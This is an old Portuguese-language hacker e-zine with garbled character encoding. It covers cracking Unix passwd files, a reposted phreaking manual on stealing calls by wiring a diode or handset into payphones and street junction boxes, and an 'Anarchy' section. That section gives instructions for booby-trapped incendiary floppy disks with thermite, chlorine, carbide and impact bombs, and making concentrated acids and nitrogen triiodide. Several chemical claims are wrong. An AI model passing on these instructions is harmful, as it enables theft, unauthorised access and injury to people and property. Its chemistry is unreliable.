
Dark Sided 
~~~~~~~~~

By Cyber Cool
		

Dark Side N§ 0
(VersÆo Beta)

IntroduÆo	

	Depois de muito esforo, estou tentando lanar este zine para 
Dark Side Hackers. Se o meu provedor nÆo cancelar minha conta, pretendo 
continuar com ele. Este Zine contm tambm partes de outros zines Hackers, que
ser  especificado quando retirado do referido. Nesta versÆo beta eu irei 
tentar colocar muitas dicas, j  que nÆo haver  nenhuma matria concreta.

				******* Enjoy ! *********

Index
~~~~~

1 - Password do Unix
2 - Phreaking
3 - Anarchy
4 - V¡rus
5 - Dicas 
6 - FAQ (nÆo  de minha autoria)
6 - Como entrar em contato
Password do Unix

	Para poder pegar a senha dos usu rios e do Super User  necess rio entrar no sistema via ftp e pegar o arquivo passwd, que est  no diret¢rio /etc/. Da¡ ao abrir o arquivo voc ver  ele assim:

username:password:UserID:GroupID:descriÆo ou nome:homedir:shell

Ex.: Dark:teHDYSJS3d:0:3:Dark Sided:/:/bin

Username: Dark
Password encriptada: teHDYSJS3d
User Number: 0
Group User: 3
DescriÆo: Dark Sided
Homedir: /
Shell: /bin

	Agora se o arquivo estiver assim:
Dark:x:0:3:Dark Sided:/:/bin

	Voc nÆo  um cara de sorte. Vai ser muito dif¡cil desencriptar a password porque o Unix est  instalado no modo High. Mais se o arquivo estiver como no primeiro exemplo, voc ainda ter  chance de desencriptar o arquivo usando o crackjack e o directionary maker, ambos na nossa Home Page. O directionary maker serve para criar um arquivo de dicion rio e o crackjack para tentar desencriptar a password.

1§ - Crie um dicion rio com o directionary maker.
2§ - use o crackjack para desencriptografar o arquivo.
	Ex.: jack password meudic.dic

Depois disso voc ter  que esperar um longo tempo para que o crackjack termine de desencriptografar o arquivo.
	Bem, isso  tudo que eu posso informar a vocs. NÆo vou informar nada explicadinho que  para nÆo acostumar.

Phreaking

	Desta vez eu nÆo tive tempo para fazer uma boa seÆo de phreaking, entÆo eu resolvi colocar este manual de phreaking que eu peguei na net.

Manual definitivo de violaÆo a telefones p£blicos e privados


		      +---------- Aviso ----------+


Antes, aquele chavÆo de sempre: todos os procedimentos  descritos nesse docu-
mento sÆo ilegais e podem levar o infrator a cumprir penas de prisÆo e/ou pa-
gamento de multas.
Vale lembrar tambm que eu sou contra qualquer tipo de vandalismo, e que todo
o processo aqui descrito nÆo causa nenhum tipo de dano aos aparelhos  telef-
nicos. Mesmo a longo prazo.
O cidadÆo idiota que copiar este documento, totalmente ou  em parte, sem avi-
sar o autor, nÆo passar  de um lamer de primeira que  nÆo faz porra nenhuma e
tenta enganar os outros mas consegue enganar a si mesmo.
Esse texto poder  ser mencionado em outros documentos, desde que  conste nes-
ses de onde ele foi retirado e quem o escreveu (no caso, eu :-))



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-



+---------------------------------------------------------------------------+
Ý                                   Öndice                                  Ý
+---------------------------------------------------------------------------+

1   - IntroduÆo
1.1 - Pref cio da versÆo 1.1
1.2 - Pobreza de informaäes e pessoas mal informadas
1.3 - Conceitos b sicos a respeito de telefonia

2   - Telefones privados
2.1 - IntroduÆo
2.2 - Efetuando ligaäes de aparelhos sem teclas

3   - Telefones p£blicos
3.1 - IntroduÆo
3.2 - Efetuando ligaäes gratuitamente utilizando um diodo
3.3 - Efetuando ligaäes gratuitamente utilizando um aparelho comum
3.4 - Conectando notebooks a telefones p£blicos
3.5 - ObservaÆo

4   - Caixas de verificaÆo
4.1 - IntroduÆo
4.2 - Efetuando ligaäes gratuitas de caixas de verificaÆo

5   - Pequena FAQ sobre telefonia
5.1 -  poss¡vel tomar um choque mexendo em fios telefnicos?
5.2 - Como fao para fazer chamadas gr tis de minha residncia?
5.3 - O que  o BINA?
5.4 - Existe alguma maneira de se bloquear o BINA?
5.5 - As famosas "boxes" funcionam aqui no Brasil?

6   - O Autor
6.1 - PGP Key
6.2 - Agradecimentos
6.3 - Como contatar o autor



+---------------------------------------------------------------------------+
Ý                           SeÆo 1 - IntroduÆo                            Ý
+---------------------------------------------------------------------------+


1.1 - Pref cio da versÆo 1.1 ----+
      
      Depois de ter editado a primeira versÆo deste manual, recebi dezenas de
mensagens, principalmento do pessoal do BHC (Brazilian Hackers Club), com v -
rias perguntas.  Algumas se  tornaram adendos e complemento para  as seäes e
outras eu levei para uma Mini-FAQ, que est  localizada na seÆo 5.

1.2 - Pobreza de informaäes e pessoas mal informadas  ----+

      Ao me deparar  com alguns textos do  gnero,  sentia-me decepcionado ao
perceber que eram incompletos e fracos, quando o assunto em questÆo era a te-
lefonia.
       triste tambm perceber que pessoas mal informadas e  sem conhecimento
tcnico (embora tenham boa vontade), assinam estes textos. Fao aqui um tuto-
rial com material bastante £til, que explica muitas coisas que podem ser fei-
tas com a intenÆo de buscar um pouco de liberdade para se utilizar os siste-
mas telefnicos.
      Este texto tambm  destinado queles que se rasgam de ler  textos ame-
ricanos de phreaking e boxing. NÆo importa o que fulano ouviu dizer que dava:
o sistema telefnico nacional  completamente diferente do usado nos E.U.A. e
nÆo permite o "boxing". Ver maiores detalhes na seÆo 5.

1.2 - Conceitos b sicos a respeito de telefonia ----+

      Ao contr rio do que muita gente pensa, os fios da linha telefnica pos-
suem uma tensÆo cont¡nua equivalente a -48 volts.  Esta tensÆo se altera para
um valor alternado de 96 volts quando o telefone toca. Portanto, ao lidar com
os fios do telefone, tenha  o cuidado de nÆo encostar  no orelhÆo, na parede,
ou em qualquer coisa  que possa "aterr -lo".  Este cuidado deve ser redobrado
se o telefone for comunit rio ou residencial. Levemos tambm  em consideraÆo
que se o aparelho possu¡ uma  tensÆo cont¡nua,  significa que ele  tem tambm
uma polarizaÆo correta (fio positivo e fio negativo).  Na instalaÆo do apa-
relho esta  polarizaÆo nÆo faz diferena,  mas quando o  assunto  violaÆo,
ela deve ser observada.
      Vamos lembrar tambm que existem dois tipos de linhas telefnicas:

      A) Dec dicas (ou Pulse) - sÆo as  linhas  dos prefixos mais  antigos do
sistema telefnico. A identificaÆo de chamadas se d  atravs de uma srie de
sinais (pulsos), que sÆo interpretados pela central telefnica.

      B) Multifrequenciais (ou Tone) - sÆo as linhas dos prefixos  mais novos
onde trabalham o servio de CPA (Central telefnica com controle por Programa
Armazenado).  A identificaÆo de  chamadas se d  atravs da  decodificaÆo de
tons frequenciais em n£meros.


+---------------------------------------------------------------------------+
Ý                       SeÆo 2 - Telefones privados                        Ý
+---------------------------------------------------------------------------+


2.1 - IntroduÆo ----+

      Nesta seÆo, explicarei o processo (bem simples) de se efetuar ligaäes
a partir de telefones sem teclas ou com cadeado,  muito comuns  em empresas e
ambientes de trabalho.

2.2 - Efetuando ligaäes de aparelhos sem teclas ----+

      Antes de comearmos, precisamos definir o  que significa "duraÆo de um
pulso". Um pulso  simplesmente uma interrupÆo no fluxo de corrente que cir-
cula na linha telefnica, e a sua duraÆo  entendida como  o espao de tempo
decorrido do in¡cio ao fim desta interrupÆo.
      Os pulsos enviados pelo aparelho telefnico quando  voc aperta o botÆo
de algum n£mero, sÆo iguais ao sinal emitido quando voc coloca o telefone no
gancho. A diferenciaÆo  feita pela central telefnica, usando como refern-
cia a duraÆo do pulso. Se ele for um pouco maior do que 0.5 segundos (aumen-
tar um pouco esse valor para as linhas mais antigas), a central considera que
 um pedido de linha.  Se a duraÆo do pulso  for menor do que  esse valor, a
central ir  considerar que um n£mero a ser discado est  sendo enviado.
      Para formar os n£meros de 0 a 9, sÆo enviado uma srie de pequenos pul-
sos em seqncia referentes ao n£mero, ou seja,  2 pulsos  para o n£mero 2, 3
para o n£mero 3 e assim por diante. Para o n£mero 0 sÆo enviados dez pulsos.
      Para simular esses pulsos sem a necessidade de teclas, basta usar o bo-
tÆo onde se "pega" a linha, aquele onde voc coloca o  telefone em cima quan-
do quer terminar uma ligaÆo. Aperte e solte este botÆo rapidamente  de acor-
do com o n£mero que voc quer discar, espere um pouco e aperte outra srie de
vezes de acordo com o outro n£mero. Lembre-se que para o  n£mero 0 deve-se a-
pertar o botÆo dez vezes.
	 Faa isso com todos os n£meros e,  ao final, voc  escutar  o tom de
chamada.


+---------------------------------------------------------------------------+
Ý                       SeÆo 3 - Telefones p£blicos                        Ý
+---------------------------------------------------------------------------+


3.1 - IntroduÆo ----+

      Nesta seÆo explicaremos alguns mtodos  de efetuar ligaäes com  tele-
fones p£blicos sem a necessidade de se gastar fichas. Mostraremos tambm como
ligar notebooks a telefones p£blicos  (se  que existe um hacker que nÆo sai-
ba...).

3.2 - Efetuando ligaäes gratuitamente utilizando um diodo ----+

      O diodo  um componente eletrnico que possui diversas utilizaäes. Po-
demos resumir seu funcionamento basicamente na seguinte s¡ntese:
      Um diodo (ou junÆo PN),  permite que a corrente  circule em apenas uma
direÆo dentro de um circuito.
      Ao  se utiliz -lo para o fim aqui desejado,  vamos precisar de um diodo
IN4002, IN4004 ou IN4007. Estes podem ser encontrados facilmente  em qualquer
casa de componentes eletrnicos. Vamos precisar tambm de um resistor com va-
lor nominal de 22K e potncia de 1W.
      Basta que voc ligue o diodo em paralelo com o resistor (conforme tenta
mostrar a ilustraÆo abaixo) e,  em seguida, descasque os fios do  telefone e
ligue cada uma das pontas obtidas com o diodo e o resistor neles.
      Lembre-se: voc vai apenas descascar os fios do orelhÆo!!! Se voc cor-
t -los, ele vai ficar sem linha.
		   

				      ||
				      ||     fio do telefone
				      ||
				      ||
		   +------------------++-------------------+
		   |                                       |
		   |                                       |
		   |           +----ÝÝÝÝÝÝÝ----+           |
		   |          /      diodo      \          |
	   ponta   +--------+                   +--------+   ponta
		   |          \                 /          |
		   |           +----ÝÝÝÝÝÝÝ----+           |
		   |                resistor               |
		   |                                       |
		   +------------------++-------------------+
				      ||
				      ||     fio do telefone
				      ||
				      ||

      
      Para executar esta tarefa, eu aconselho que voc  descasque os fios dos
orelhäes que voc utiliza com mais freqncia pois,  devido ao fato  dos fios
do telefone p£blico serem muito grossos, nÆo  um trabalho que se possa fazer
tranqila e rapidamente sem ser notado.
      Voc dever  observar tambm a polarizaÆo correta a ser utilizada.  Vo-
c perceber  isso facilmente pois, quando voc ligar o diodo de maneira erra-
da, o orelhÆo vai ficar sem linha.
      Uma dica pessoal: os telefones de cabine e os de cartÆo sÆo mais f ceis
de serem violados. Alguns orelhäes comuns tem uma proteÆo blindada que impe-
dem o acesso ao cabo telefnico. Embora mesmo assim seja poss¡vel puxar o fio
com um gancho, que voc enfiar  do lado esquerdo do aparelho telefnico,  en-
tre o telefone e uma grade preta de sustentaÆo que fica atr s dele, eu acon-
selho que voc evite esses tipos.
      Vamos voltar um pouco para a parte tcnica da coisa.
      O diodo que estamos utilizando vai funcionar da seguinte maneira:
      Quando uma ligaÆo  completada de um  telefone p£blico,  a central in-
verte a polarizaÆo do telefone de -48 para 48 volts. Quando o aparelho tele-
fnico percebe isso,  ele pede uma fixa.   a¡ que entra  em funcionamento  o
nosso querido diodo. Ele permite que a tensÆo caia at 0 volts, mas nÆo  per-
mite que ela se torne positiva. Dessa forma o orelhÆo nÆo vai pedir a ficha.
      Nesse caso o resistor est  funcionando apenas como um dissipador de po-
tncia, para que voc nÆo d o azar de queimar o diodo  (nÆo que ele seja ca-
ro,  que em algumas localidades ele pode ser uma pea rara que custa R$0,10)
e ficar sem telefonar. Mesmo se voc nÆo achar nenhuma loja que venda,  pegue
uma placa antiga de alguma coisa que tenha queimado.  Elas sempre tem diodos.
Voc deve procurar uma pea  pequinininha que tem  dois terminais,   preta e
normalmente estar  escrito IN qualquer coisa.

3.3 - Efetuando ligaäes gratuitamente utilizando um aparelho comum ----+

      Primeiro, voc deve tomar os processos citados anteriormente  para des-
cascar os fios do telefone. Em seguida voc deve  conseguir um aparelho tele-
fnico comum e ligar cada uma das pontas dos fios dele nos fios do orelhÆo.
      Para facilitar a sua  vida, eu aconselho que o seu telefone  seja o me-
nor poss¡vel e que voc prenda um jacar  (pequeno gancho  achado em qualquer
loja de componentes eletrnicos) em cada uma das pontas do seu telefone, para
facilitar a ligaÆo no orelhÆo.
      A¡  s¢ efetuar a ligaÆo normalmente.

3.4 - Conectando notebooks a telefones p£blicos ----+

      O processo para se conectar notebooks a orelhäes,  igual ao de se  co-
nectar telefones comuns. Resumirei nesse item,  algumas consideraäes  a res-
peito da fiaÆo  do notebook,  que segue os  padräes da FCC  Americana e  um
pouco diferente da nossa.
      O conector do fio do notebook, que  do tipo jack, tem quatro fios den-
tro dele. Arranque o conector de pl stico  transparente  que fica na ponta do
fio, pegue os dois fios centrais e separe-os dos fios das extremidades.
      Estes dois fios centrais, sÆo os que serÆo utilizados  para fazer a li-
gaÆo no orelhÆo. Eu aconselho que voc coloque jacars neles tambm.
      Basta conectar-se a BBS's da mesma forma que voc se conecta em casa.
      Caso voc queira testar se est  tudo OK,  abra um programa de  terminal
qualquer e digite o comando ATA, se fizer um barulhinho parecido com o tom de
linha  que est  tudo OK.

3.5 - ObservaÆo ----+

      As chamadas telefnicas se dividem em trs categorias: locais,  DDD re-
gionais e interurbanas (ou nacionais).
      As chamadas locais sÆo aquelas efetuadas dentro  de sua cidade,  as DDD
regionais sÆo as ligaäes feitas dentro do complexo urbano onde voc mora, no
caso de SÆo Paulo, as chamadas DDD regionais sÆo aquelas feitas para as cida-
des que  fazem parte da Grande SÆo Paulo: Jundia¡, Santo Andr, SÆo Bernardo,
etc. As chamadas interurbanas sÆo aquelas feitas para fora do complexo urbano
onde voc est  localizado. Usando SÆo Paulo como exemplo, podemos citar o in-
terior do estado de SÆo Paulo e cidades localizadas em outros estados.
      Os telefones comuns efetuam chamadas locais e DDD regionais, e os tele-
fones DDD efetuam chamadas interurbanas, ou seja, para qualquer lugar do Bra-
sil.


+---------------------------------------------------------------------------+
Ý                     SeÆo 4 - Caixas de verificaÆo                       Ý
+---------------------------------------------------------------------------+


4.1 - IntroduÆo ----+

      As caixas de verificaÆo (ou arm rios na linguagem "tcnica" da Telesp)
sÆo caixas de ferro, que geralmente ficam localizadas em vias p£blicas, e sÆo
utilizadas para se fazer a checagem das linhas do sistema e  identificar pro-
blemas antes de se enfiar no subsolo para tentar resolv-los.
      Tais caixas costumam ser da cor cinza  e tem cerca de 1,5 m  de altura,
com um c¢digo em preto escrito na parte superior.
      Elas possuem um grande n£mero de fios telefnicos, todos eles divididos
em pares. Tais caixas podem ser facilmente abertas (se  que a que voc achar
j  nÆo estiver arrombada), pois geralmente possuem uma tranca padrÆo em forma
de tringulo que qualquer chaveiro conhecido pode fazer.
      Lembre-se que voc  um hacker, nÆo um vandalo. NÆo v  arrombar a porra
da caixa. Isto  coisa pra quem nÆo tem crebro. Mesmo se ela estiver tranca-
da com um cadiado. Se nÆo puder abrir um cadiado ou procurar informaÆo de um
mtodo para abr¡-lo, procure outra caixa.  Ou entÆo esquea que voc leu esta
seÆo.

4.2 - Efetuando ligaäes gratuitas de caixas de verificaÆo ----+

      Para se efetuar uma ligaÆo de dentro destas caixas, basta que voc pe-
gue um dos diversos pares de fios que se encontram l  dentro e ligue  eles ao
seu pequeno telefone comum port til ou a um notebook.  NÆo esquea de por  os
fios que voc tirou de volta no lugar para que, nem o pessoal da manutenÆo e
nem o dono da linha, percebam.
      Como essas caixas de verificaÆo costumam se situar em  vias bem  movi-
mentadas, a pr tica desse tipo de ligaÆo  desaconselhada. Mas, como toda  a
regra tem sua exceÆo, fica aqui mais uma informaÆo para voc.
      Vale lembrar que de caixas de verificaÆo, pode-se  efetuar telefonemas
para qualquer lugar, inclusive chamadas internacionais.


+---------------------------------------------------------------------------+
Ý                   SeÆo 5 - Pequna FAQ sobre telefonia                    Ý
+---------------------------------------------------------------------------+


5.1 -  poss¡vel tomar um choque mexendo em fios telefnicos? ----+
      
      Como descrito no item 1.3, os fios telefnicos possuem uma tensÆo sufi-
ciente para dar choque relativamente forte em uma pessoa.  Este valor de ten-
pode atingir um patamar em que ele pode dar um verdadeiro coice na pessoa, no
momento em que a linha envia o sinal para o telefone tocar.
      Isto depende muito da situaÆo e da pessoa.  Se voce estiver com a  mÆo
no orelhÆo e mexer nos fios, voc provavelmente vai tomar um choque legal. Se      
voc tiver acabado de comer algo salgado, provavelmente este choque ser  ain-
da mais forte, pois o sal aumente a condutividade do seu corpo.

5.2 - Como fao para fazer chamadas gr tis de minha residncia? ----+

      Quando voc efetua uma chamada, a central telefnica identifica de onde
voc est  discando, identifica  qual o tipo de telefone que  voc est  usando
(p£blico ou residencial), e entÆo ela arquiva pra onde est  senda feita a li-
gaÆo e toma as providncias necess rias com relaÆo a cobrana.
      Essa identificaÆo  feita na fonte e nÆo por um sinal enviado pelo seu
telefone. Desse modo,  praticamente imposs¡vel pra voc que est   na sua re-
sidncia, tentar driblar essa tarifaÆo. Imagine que sua linha telefnica nÆo
passa de um ramal de PABX.

5.3 - O que  o BINA? ----+
      
      O BINA,  um sistema de identificaÆo de chamadas desenvolvido com tec-
nologia nacional, que permite  a quem est  recebendo a chamada,  visualizar o
n£mero do telefone de quem est  telefonando para ele.
      O esquema teve que ser desenvolvido aqui no Brasil,  pois o sistema te-
lefnico  tÆo arcaico, que nÆo existiam pacotes prontos  para se adquirir.  
como voc tentar comprar um Kit Multim¡dia para um TK-85 ou um MSX.
      Tal sistema s¢ funciona em linhas Dec dicas,  portanto,  se voc quiser
passar um trote para algum, procure se certificar  qual o tipo de linha  que
ela possui. Para isso,  basta voc dar uma olhada no  prefixo e ligar  para a
sua  compania telefnica  local perguntando se  ele suporta CPA.  Se eles fa-
larem que sim,  entÆo pode ficar  tranqilo e efetuar a  ligaÆo que voc nÆo
corre o risco de ser descoberto.
      Mas tome cuidado com o que voc vai fazer pois,  sob ordem judicial, as
companias locais podem fornecer um rastreamento de chamadas e assim descobrir
de onde voc telefonou.

5.4 - Existe alguma maneira de se bloquear o BINA? ----+

      Da mesma maneira que a tarifaÆo, o BINA nÆo pode ser driblado do tele-
fone que voc est  efetuando a chamada. Quem fornece o n£mero  que vai apare-
cer no aparelho do receptor,  enviado pela central telefnica e nÆo pelo seu
telefone.
      Vale que acrescentar que o sistema nÆo funciona perfeitamente bem e que
s vezes nÆo consegue identificar determinada chamada. Ele tambm nÆo identi-      
fica chamadas de telefones p£blicos.

5.5 - As famosas "boxes" funcionam aqui no Brasil? ----+

      Como se pode notar nesta seÆo, o sistema telefnica nacional, trabalha
de maneira centralizada ao contr rio do americano que trabalha  de forma dis-
tribu¡da. E nÆo  por acaso, pois, alm  de possuirem um n£mero bem  maior de
linhas telefnicas, os servios l  sÆo privatizados e diversas companias ofe-
recem linhas telefnicas.
      A tarifaÆo se d  por diversas identificaäes enviadas  pelos telefones
e diversas centrais distribuidas pelo pa¡s. O que os "boxes" fazem, e driblar
esses sinais enviando outros de diversas freqenciais diferentes.
      Por exemplo, voc faz uma chamada internacional mas usa uma "box"  para
enviar um sinal para a central de como esta chamada fosse uma chamada local.
      J  de  telefones  p£blicos (quem j  foi pra l  sabe disso),  depois que
voc efetua uma chamada, aparece novamente um tom de linha que fica aguardan-
do o sinal do orelhÆo que diz que voc pagou determinada taxa para o determi-
nado servio. Neste caso os "boxes" enviam os sinais no  lugar do orelhÆo e a
chamada  completada. Esses tipos sÆo conhecidos como Red Boxes, mas nÆo fun-
cionam em todos os telefones p£blicos.
      Sem bem que, ultimamente,  as centrais telefnicas  estÆo sendo substi-
tu¡das por modelos mais novos. Isto  ocorre principalmente em SÆo Paulo.  Mas
caso  elas permitam o "boxing",  isto ser  um assunto para um  pr¢xima versÆo
desta FAQ.


+---------------------------------------------------------------------------+
Ý                            SeÆo 6 - O autor                              Ý
+---------------------------------------------------------------------------+


6.1 - Agradecimentos ----+

      Agradeo a todas aquelas pessoas que escreveram textos ruins sobre vio-
laÆo de telefones e me estimularam a fazer um trabalho melhor elaborado.
      Espero em breve  poder escrever uma FAQ sobre  telefonia celular, deta-
lhando processos de escuta telefnica e mais algumas coisas.      
      Obrigado ao pessoal do  Brazilian Hackers Club,  que mandaram perguntas
que foram adicionadas a SeÆo 5.  Suas perguntas  ajudaram tambm a completar
algumas seäes.  Hackers do Brasil,  uni-vos contra o  preconceito e contra o
vandalismo eletrnico.
      Agradeo tambm a todos aqueles que contribuem para que haja uma  maior
liberdade de expressÆo em todos os meios de comunicaÆo, em especial, a nossa
querida NET. Saudaäes tambm a todos aqueles que lutam por condiäes  melho-
res de vida. Quem sabe um dia possamos viver em um mundo mais justo e com me-
nos desigualdades sociais. Morte ao pensamento neoliberal.

"Lutamos por um mundo melhor. Um mundo onde voc possa ser feliz sem que isso
implique na infelicidade do seu pr¢ximo"

Marcos - L¡der do Exrcito Zapatista de LibertaÆo Nacional


6.2 - PGP Key ----+

Tipo Bits/IDChave  Data       Usu rio (IDU)
pub  1024/11E9A405 1996/12/21 Tom Waits <tom.waits@usa.net>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzK7UwMAAAEEANQz27W9JQUVDYLxEGVX8l0An1tYLbbLXwEg6xBc9Y6/dcAa
bn+Z5RbT5PrkySCVaLgePIfCKCzAEAkbAyCES7X2YNoHDD6Ea4AQn7TDWbP0Wprw
xbJErRuuE1G+WquDa/nPSmsrZw+h29Ec3AR/G3/WW/95FD8yybLjR4gR6aQFAAUR
tB1Ub20gV2FpdHMgPHRvbS53YWl0c0B1c2EubmV0PokAlQMFEDK7UwOy40eIEemk
BQEByRIEAKPvqZAEEk6oyZXyfs82gc/Lt4cBNonFm1CBph4w/JqX7QkkSibD7PUW
ewsTxht6ESsJbDWsT0st7bU9UfLJFqfeOMq5NH4q8gpJQFFG9IBUx/PrZxeOAwpa
SWIfUGt/cfOHn0gurh1AgktS5NyXOeRL5QDw0x3O/XKNY/Pv03KV
=+Fdu
-----END PGP PUBLIC KEY BLOCK-----


6.3 - Como contatar o autor ----+

      Para esclarecimentos ou correäes, mande-me um e-mail ou procure-me  no
Brazilian Hackers Club. Uma associaÆo mantida da livre iniciativa de um cara
muito dedicado que atende por Liquid Byte.
      Terei prazer em responder a perguntas inteligentes, nÆo sou fresco como
alguns membros da comunidade...
      Dependendo do que voc  for perguntar, isto ,  coisas comprometedoras,
use o PGP. Tenha bom senso. Se voc fizer perguntas idiotas, receber  respos-
tas cretinas.

e-mail: tom.waits@usa.net
LiquidByte home-page (Brazilian Hackers Club)
http://www.geocities.com/SiliconValley/Heights/6152/

Free Speech!!!
Rage Against The Machine.

Anarchy

	Como eu j  tinha dito, estou sem tempo, mas na pr¢xima ediÆo eu coloco uma seÆo mais completa.

ARMA DE SOPRO

Para a arma voc precisa de:

* Um cano de aproximadamente 0.7 mm de dimetro.

Para os dardos voc precisa de:

* Um l pis com a borracha;
* Um alfinete ou agulha de costura;
* LÆ;
* Fita adesiva.

Instruäes:

	Retire a borrachinha com o metal do l pis. Recorte uns pedacinhos de 2 cm de lÆ e prenda com a fita adesiva no fundo do alfinete. Deixe o fundo do alfinete bem grosso com bastante fita. Enfie o alfinete na borracha pelo lado do metal. Force bem para que a parte com fita prenda na borrachinha.
	
	Para atirar, coloque dardo dentro do cano e assopre.

O autor nÆo  respons vel pelos atos de seus leitores. Corra seus pr¢prios riscos.

DISQUETE-BOMBA


Voc precisa de:

* 1 ou mais discos de 3.5 polegadas;
* Uma caixa de f¢sforo, azul ou branco SOMENTE!;
* Um estilete bem afiado;
* Um frasco de cimento pl stico ou argamassa;
* Um cent¡metro de magnsio em tiras (opcional);
* Uma grama de termite. Mistura de alum¡nio pulverizado e ¢xido de ferro, 
     usada na produÆo do ao (opcional).

Instruäes:

	Abra cuidadosamente o diquete. Com o disco aberto voc tem que escolher entre arrancar a proteÆo onde fica a marca do disco (normalmente de metal), ou deixar ela no lugar. Se a proteÆo for arrancada, a bomba vai ficar vis¡vel e voc mesmo ter  de coloc -la no drive. Se a proteÆo ficar no lugar, voc pode dar o disco para um "amigo". Raspe a cabea dos f¢sforos e amasse para que vire um p¢. Retire o pano do disquete e cubra um ou ambos os lados do disco com a argamassa. Espalhe o p¢ dos f¢sforos em cima e deixe secar. Feche o disco colando os cantos e pronto!
	Se voc quiser um estrago maior, coloque a tira de magnsio em cima do p¢ dos f¢sforos. Se voc quiser destruir o computador, coloque o termite em baixo do magnsio.

Funcionamento:

	Quando o disco for acessado o p¢ dos f¢sforos ir  atritar e acender. O disco vai derreter e se espalhar pelo drive. Se voc usou o magnsio, o calor gerado pelos f¢sforos vai acender a tira. O magnsio vai queimar destruindo o drive permanentemente e, com sorte, outras coisas mais que estiverem por perto. Se voc usou o magnsio e o termite juntos, o magnsio ir  acender o termite e ele vai comear a agir. O termite vai queimar o disco, o drive, o gabinete, a mesa, o chÆo e vai pingar em algum lugar perto do JapÆo.

O autor nÆo  respons vel pelos atos de seus leitores. Corra seus pr¢prios riscos.

BOMBA DE CLORO

Voc precisa de:

* Cloro (com Hipocloreto de S¢dio);
* µgua;
* A£car;
* Uma garrafa de dois litros.

Instruäes:

	Misture o cloro, a  gua e o a£car em partes iguais. Encha mais ou menos 1/10 da garrafa com a mistura. Deixe no chÆo e corra.

Funcionamento:

	As substncias reagem e soltam gases. A pressÆo dentro da garrafa aumenta e ela explode.

BOMBA DE CARBONETO

Voc precisa de:

* Carboneto de C lcio;
* Um pote de vidro com tampa;
* µgua.

Instruäes:

	Encha o vidro com  gua. Coloque o Carboneto de C lcio no vidro e tampe. Deixe no chÆo e saia correndo. Corra MESMO !! Esse tipo de bomba  muito perigoso.

Carboneto de C lcio pode ser encontrado facilmente em qualquer loja de construÆo.

Funcionamento:

	O Carboneto vai reagir com a  gua e formar um g s inflam vel chamado Carbonato de Acetileno. A pressÆo no pote de vidro ir  aumentar e o pote ir  estourar.
	Se voc quiser um maior estrago, deixe um pedao de pano queimando por perto. O vidro estoura, o Acetileno atinge a chama e explode formando uma bola de fogo.

BOMBA DE FUMAA

Voc precisa de:

* A£car;
* Nitrato de Pot ssio;
* Um pote com boca larga.

Instruäes:

	Junte 4 partes de a£car com 6 partes de Nitrato de Pot ssio numa panela. Esquente em fogo baixo e mexa bem at derreter tudo. Coloque a mistura no pote e, antes de solidificar, jogue alguns f¢sforos para funcionar como pavio.

Funcionamento:

	O f¢sforo queima e acende a mistura. Acontecem reaäes qu¡micas e a fumaa  liberada.

O autor nÆo  respons vel pelos atos de seus leitores. Corra seus pr¢prios riscos.

BOMBA DE IMPACTO

Voc precisa de:

* Uma bola de gude;
* P¢lvora;
* Um saco pl stico;
* Linha ou barbante.

Instruäes:

	Recorte um pedainho do pl stico que seja suficiente para embrulhar a bola de gude. Coloque um pouco de p¢lvora em cima do pl stico, a bola em cima da p¢lvora e embrulhe-a com o pl stico. Amarre a ponta com o barbante, fazendo com que fique bem firme para a p¢lvora nÆo sair. Para detonar, jogue a bomba em alguma superf¡cie dura.

Funcionamento:

	Quando a bomba bate na superf¡cie dura, a bola de gude espreme a p¢lvora fazendo com que estoure. A explosÆo  bem forte mesmo com pouca p¢lvora, entÆo tome cuidado pois a bola  espatifada e voam pedaos de vidro por todos os lados.

	Em est dios de futebol foram encontradas bombas com bolas de sinuca em vez de bolas de gude. Invente voc sua bomba (s¢ nÆo v  usar bolas de boliche!!).

O autor nÆo  respons vel pelos atos de seus leitores. Corra seus pr¢prios riscos.

FAZENDO SUBST¶NCIAS DE DIFÖCIL ACESSO

µCIDO SULFéRICO CONCENTRADO

Voc precisa de:

* µcido de bateria (comprado em qualquer loja automotiva);
* Uma panela de vidro.

Instruäes:

	Coloque o  cido na panela de vidro e ferva at aparecer uma fumaa branca. Quando essa fumaa branca aparecer, apague o fogo e guarde o µcido Sulf£rico Concentrado em um pote de vidro com uma tampa hermetica.


NITRATO DE POTµSSIO

Voc precisa de:

* P¢lvora comum;
* µgua;
* Um coador (de caf serve);
* Uma panela.

Instruäes:

	Dissolva a p¢lvora numa panela com  gua fervente. Mexa por uns instantes. Coe a soluÆo com um coador por diversas vezes at a soluÆo ficar transparente. O que ficar no coador  carvÆo e enxofre e pode ser descartado. A soluÆo, depois de coada, apresenta o Nitrato de Pot ssio dissolvido em  gua. Deixe a  gua evaporar e est  pronto.

µCIDO NÖTRICO CONCENTRADO

Voc precisa de:

* Nitrato de Pot ssio;
* µgua destilada;
* µcido Sulf£rico concentrado;
* FogÆo;
* Uma Retorta (um pote com o gargalo entortado para baixo);
* Um tubo de ensaio;
* Um recipiente com gelo;
* Uma vareta para agitar a soluÆo.

Instruäes:

	Coloque 32 mil¡metros de  cido sulf£rico concentrado na retorta. Junte 68 gramas (BEM PESADAS) de nitrato de pot ssio e agite cuidadosamente at dissolver tudo. Coloque o tubo de ensaio no recipiente com de gelo e leve at a boca da retorta. Comece entÆo a esquentar a retorta. A soluÆo ir  evaporar e seguir pelo gargalo at o tubo de ensaio. Com o frio do tubo, ela condensar  e voc tem o µcido N¡trico Cocentrado. Continue a operaÆo at acabar toda a soluÆo na retorta e guarde o  cido num pote de vidro com tampa.

CRISTAIS DE TRIàXIDO DE AMâNIA

Voc precisa de:

* Cristais de Iodo;
* Amnia (transparente);
* Funil;
* Filtro de Papel;
* Papel Toalha;
* Duas jarras de vidro velhas;

Instruäes:

	Coloque duas coleres-de-ch  de iodo em uma das garrafas. V  despejando amnia at cobrir o iodo. Colque o filtro no funil e o funil na outra garrafa. Deixe o iodo encharcar um pouco na amnia e depois despeje-o no funil. Retire o funil e espalhe as pedrinhas formadas no papel toalha para secar ao sol. Essa substncia tem uma vida £til de aproximadamente 1 semana, portanto nÆo estoque ou guarde.

NITRATO DE AMâNIA

Voc precisa de:

* Um frasco de boca larga;
* Uma bacia com gelo;
* µcido N¡trico;
* Amnia.

Instruäes:

